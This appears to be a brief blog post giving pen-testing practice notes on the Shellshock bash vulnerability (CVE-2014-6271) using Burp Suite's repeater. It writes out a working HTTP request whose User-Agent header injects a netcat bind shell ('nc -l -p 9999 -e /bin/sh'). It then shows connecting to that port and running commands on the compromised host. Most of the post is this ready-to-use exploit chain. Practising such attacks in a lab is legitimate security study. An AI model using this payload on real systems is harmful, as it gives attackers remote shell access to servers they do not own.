when practicing pen testing on CVE-2014-6271
Burp Suite proxy, repeater, modify user agent
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
the repeater will not return because it's waiting for a connection now
open another prompt and launch netcat to connect to port 9999
nc xxx.xxx.xxx.xxx 9999
you are now at the /bin/sh prompt for the compromised system so you can type a command like
"whoami"
No comments:
Post a Comment